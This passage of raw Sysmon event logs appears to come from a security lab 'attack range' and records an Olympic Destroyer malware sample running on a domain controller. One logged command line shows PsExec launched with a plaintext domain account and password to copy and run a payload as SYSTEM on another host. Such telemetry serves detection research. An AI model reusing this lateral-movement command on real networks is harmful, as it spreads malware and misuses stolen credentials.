Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.741{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-130F-6216-3206-000000003802}1804C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.741{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-130F-6216-3206-000000003802}1804C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.705{C8EA50B7-130F-6216-3206-000000003802}18046960C:\Windows\system32\conhost.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292788Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.625{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-130F-6216-3206-000000003802}1804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292787Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.606{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130F-6216-3206-000000003802}1804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292786Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.471{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292785Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.471{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292784Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.471{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292783Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.471{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000292782Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.456{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=30FC3E83A8EA8DF80B1B0125F6CF119B,SHA256=85F2E566DF329534786B30A81D92D9C93F7C3C0EC23DC9339F24E4C4B7420F30,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292781Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.456{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292780Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.456{C8EA50B7-12E6-6216-4B05-000000003802}67926928C:\Temp\olympic_destroyer.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9278(wow64)|C:\Windows\System32\KERNELBASE.dll+15a0bb(wow64)|C:\Windows\System32\KERNELBASE.dll+159d6c(wow64)|C:\Temp\olympic_destroyer.exe+469a|C:\Temp\olympic_destroyer.exe+47ec|C:\Temp\olympic_destroyer.exe+4985|C:\Temp\olympic_destroyer.exe+5ac1|C:\Temp\olympic_destroyer.exe+84b3|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 154100x8000000000000000292779Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.459{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe2.2Execute processes remotelySysinternals PsExecSysinternals - www.sysinternals.compsexec.cC:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe \\ip-10-0-1-12.eu-central-1.compute.internal -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000292778Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.456{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-130F-6216-3106-000000003802}6920C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292777Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-130F-6216-3006-000000003802}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-130F-6216-3006-000000003802}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292771Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.402{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-130F-6216-3006-000000003802}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000292770Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:19.404{C8EA50B7-130F-6216-3006-000000003802}2236C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000217801Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:20.274{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA5CE2D148863E08BE751672547D0D1,SHA256=7BAB551F1E64F4D381CD7BF669BAC8F78900AF5F591052E67B01842E0E88216A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292815Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.875{C8EA50B7-1310-6216-3406-000000003802}55524888C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292814Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.628{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1310-6216-3406-000000003802}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292813Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.628{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292812Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.627{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292811Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.627{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1310-6216-3406-000000003802}5552C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000292810Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.627{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292809Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.627{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000292808Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:20.626{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1310-6216-3406-000000003802}5552C:\Program 